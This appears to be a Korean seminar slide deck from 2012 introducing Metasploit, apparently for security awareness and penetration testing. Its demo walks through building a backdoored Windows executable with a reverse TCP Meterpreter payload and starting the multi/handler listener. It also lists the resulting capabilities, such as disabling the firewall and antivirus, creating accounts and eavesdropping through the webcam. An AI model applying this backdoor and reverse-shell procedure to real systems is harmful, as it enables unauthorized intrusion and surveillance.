Matasploit 의 소개와 사용법

Matasploit 의 소개와 사용법

• 2012. 7. 20

I. Matasploit 소개

II. 주요기능

III. 주요공격 Demo

IV. 토론 및 시사점

별첨 . VIRUS Total 탐지여부 확인

목차

I. Metaspoit 이란 ?

• History- 2003 년 여름 HD Moore 가 코드연구 및 개발등에서 악용될 취약점을 공개할 목적으로

Metasploit 프로젝트를 시작했으며 , 현재도 Rapid7 에서 최고보안책임자로써 활동하고 있고 그는 2008 년 세계 보안분야의 영향력 있는 인물 15 인 안에 선정된 바 있음 . - Metaspoit 은 관련 도구등 을 활용하여 취약점 점검에 편리하도록 익스플로잇을 모아놓은 오픈소스 프레임워크로 , 취약점에 대한 깊이 있는 지식이 없어도 간단하고 쉽게 취약점 점검가능

※ 홈페이지 : http://www.metasploit.com※ HD Moore 사진

• 기능- 침투테스트

- 웹 캠 , 마이크 활용한 도청등의 해킹 - 취약성점검 (Nessus, 오라클 , 어도비 플래쉬 및 각종 프로토콜 등 - 백도어

II. Matasploit 주요 기능

• 지원 OS- Windows, Unix, Linux

※ V4.0.0 기준 explits 등이 작년 8 월 1 일 업데이트 확인

III. 타겟시스템 모듈 생성

…

중략

Demo

1. 특징- 리버싱 shell 코드는 방화벽 우회 가능

- metasploit 을 통하여 간단히 생성 가능 2. 사용법

① 모듈 로드 - 공격에 필요한 모듈 로드② PAYLOAD

- 공격 후 취할 행동 결정③ 위 PAYLOAD 상세 타입 결정④ 모듈 생성 완료

3. 상세 안내• Backtrack5 를 Vmware 상에서 실행• /pentest/exploits/SET/set 프로그램 실행 - 메뉴 중 4 번 Create a 4Payload and Listener 선택 - 메뉴 2 번 Windows Reverse TCP Meterpreter 선택 - 메뉴 16 번 Backdoored Executable (BEST) 선택 - listener port = Random(enter for default) 적용

- start the listener now? Yes or no “NO” 선택 msf.exe 파일 생성

4. 리스너 (console) 실행• use exploit/multi/handler – 공격할 exploit 설정• set PAYLOAD windwos/meterpreter/reverse_tcp – 어떤 코드 실행할지 설정• set lhost , set lport 후 exploit

VI. 주요 공격 및 시사점

• 주요공격- 원격에서 타겟시스템의 계정생성

- 원도우 보안설정 ( 방화벽 , 백신 ) 기능 해제- 타겟 시스템의 프로그램 임의 실행

• 시사점 - 해당 공격에 대한 모니터링이 가능한가 ? - 초기 타겟 시스템에 쉘 코드는 어떠한 방법들로 실행 시킬수 있는가 ?

Demo

별첨 . 바이러스 토탈 (www.virustotal.com) 정보

1. 파일정보 2. MD5 정보

별첨 . Doolgi (http://112.169.19.236/) 정보

1. 파일정보

감사합니다 .